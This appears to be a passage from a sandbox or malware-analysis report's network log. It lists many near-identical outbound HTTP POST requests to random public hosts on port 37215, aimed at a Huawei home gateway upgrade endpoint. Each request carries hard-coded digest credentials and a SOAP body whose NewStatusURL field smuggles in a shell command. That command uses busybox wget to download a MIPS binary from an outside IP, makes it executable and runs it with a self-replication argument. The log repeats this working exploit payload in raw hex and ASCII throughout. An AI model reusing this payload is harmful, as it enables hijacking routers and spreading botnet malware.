[TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1696192.168.2.2343270197.181.62.25537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535728931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1697192.168.2.2355296197.174.241.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535748959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1698192.168.2.2354862157.253.110.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.535748959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1699192.168.2.2338588157.147.159.16437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536268950 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1700192.168.2.236073840.222.140.18937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536387920 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1701192.168.2.2359170157.191.5.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536510944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1702192.168.2.234629041.12.96.24337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536530972 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1703192.168.2.234355641.233.249.237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536663055 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1704192.168.2.2348694197.127.55.3737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536684036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1705192.168.2.2349288157.86.19.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536684990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1706192.168.2.235784641.45.135.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536684990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
